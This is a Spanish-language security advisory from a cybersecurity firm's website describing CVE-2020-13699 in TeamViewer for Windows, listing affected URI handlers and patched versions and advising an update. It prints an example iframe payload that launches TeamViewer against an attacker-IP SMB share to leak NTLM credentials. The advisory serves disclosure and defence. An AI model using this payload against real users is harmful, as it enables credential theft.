• Saltar a la navegación principal
  • Saltar al contenido principal
S2GRUPO

Empresa Española Especializada en Ciberseguridad

  • Empresa
    • Sobre nosotros
    • Equipo directivo
    • RSE
    • Reconocimientos
  • Especialización
    • OT Industrial
    • IT
    • OT Salud
  • Soluciones
  • I+D+i
    • I+D
    • S2X
  • Talento
  • Noticias y publicaciones
  • Contacto
  • facebook
  • twitter
  • instagram
  • linkedin
|
es arrow down
  • en
© 2025 S2 Grupo
Alertas

Vulnerabilidad de criticidad alta en TeamViewer para escritorio Windows

A día 30 de Julio de 2020, se publicó una vulnerabilidad para la versión de escritorio de Windows de TeamViewer que permitiría a un atacante lanzar a ejecución dicha aplicación, con parámetros arbitrarios.
30 Jul 2020

ANÁLISIS

La vulnerabilidad que ha sido catalogada como CVE-2020-13699, y cuenta con un CVSS3 de 8.8[1], permitiría a un atacante lanzar a ejecución TeamViewer con parámetros arbitrarios y forzar el envío de una solicitud de autenticación con NTLM que podría posteriormente derivar en el robo de credenciales.

La vulnerabilidad está presente en  teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. Ha sido resuelta para las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

Para explotar la vulnerabilidad el atacante tan solo tiene que incrustar un elemento "iframe" en una página web (<iframe src='teamviewer10: --play \attacker-IPsharefake.tvs'>). Una vez la víctima accede a este enlace, el cliente de escritorio Windows de TeamViewer arrancará abriendo también un SMB share.[3][4]

El proveedor ya ha publicado una actualización que permite solventar la vulnerabilidad.

RECOMENDACIONES

Se recomienda aplicar la solución publicada por el proveedor, actualizando a la versión más reciente que solvente la vulnerabilidad [1]

REFERENCIAS

[1]https://nvd.nist.gov/vuln/detail/CVE-2020-13699
[2]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699
[3]https://thehackernews.com/2020/08/teamviewer-password-hacking.html
[4]https://jeffs.sh/CVEs/CVE-2020-13699.txt
[5]https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448#

  • Facebook
  • Twitter
  • LinkedIn
Artículos relacionados
Vulnerabilidades en productos de Cisco 2025
Leer más →
Vulnerabilidades en SAP NetWeaver AS Java 2025
Leer más →
Vulnerabilidades en SureTriggers 2025
Leer más →

Síguenos en nuestra newsletter

Suscríbete a través de tu email para estar al día

S2GRUPO
© 2025 S2 Grupo
  • Central de prensa
  • Aviso legal
  • Política de Privacidad
  • Política de Cookies
  • Canal Ético